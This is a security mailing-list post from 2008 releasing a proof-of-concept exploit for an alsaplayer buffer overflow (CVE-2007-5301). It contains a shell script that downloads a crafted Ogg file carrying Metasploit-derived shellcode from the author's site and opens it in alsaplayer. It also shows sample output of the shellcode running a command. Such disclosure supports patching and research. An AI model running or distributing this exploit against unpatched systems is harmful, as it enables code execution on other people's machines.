Hello,

I have released this PoC for the alsaplayer bug CVE-2007-5301.

You can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/

#!/bin/sh
#
# http://www.wekk.net/research/CVE-2007-5301/CVE-2007-5301-exploit.sh
#
# Exploit for alsaplayer before 0.99.80-rc3. Tested with the debian etch package
# alsaplayer-common at version 0.99.76-9
#
# CVE-2007-5301 / DSA-1538
#
# by Albert Sellarès <whats[at]wekk[dot]net> - http://www.wekk.net
# 2008-04-09
#
# Shellcode is based on metasploit framework. If you want to test it in other
# systems, maybe you have to recalculate offsets.
#
# Example:
#
# whats@debian:~$ ./CVE-2007-5301-exploit.sh
# Alsaplayer buffer overflow < 0.99.80-rc3
# by Albert Sellarès <whats[at]wekk[dot]net> - http://www.wekk.net
#
#
# --12:19:27-- http://www.wekk.net/research/CVE-2007-5301/exploit.ogg
# => `exploit.ogg'
# Resolving www.wekk.net... 64.22.71.90
# Connecting to www.wekk.net|64.22.71.90|:80... connected.
# HTTP request sent, awaiting response... 200 OK
# Length: 5,421 (5.3K) [application/ogg]
#
# 100%[===============================================================================>] 5,421
# 12:19:28 (37.00 KB/s) - `exploit.ogg' saved [5421/5421]
# uid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)
#

echo -e "Alsaplayer buffer overflow < 0.99.80-rc3"
echo -e "by Albert Sellarès <whats[at]wekk[dot]net> - http://www.wekk.net\n\n"
wget http://www.wekk.net/research/CVE-2007-5301/exploit.ogg
alsaplayer exploit.ogg

--
Albert Sellarès          GPG id: 0x13053FFE
http://www.wekk.net      whats_up@xxxxxxxxxx
Member of Catux.org      http://catux.org
Linux User: 324456       Catalunya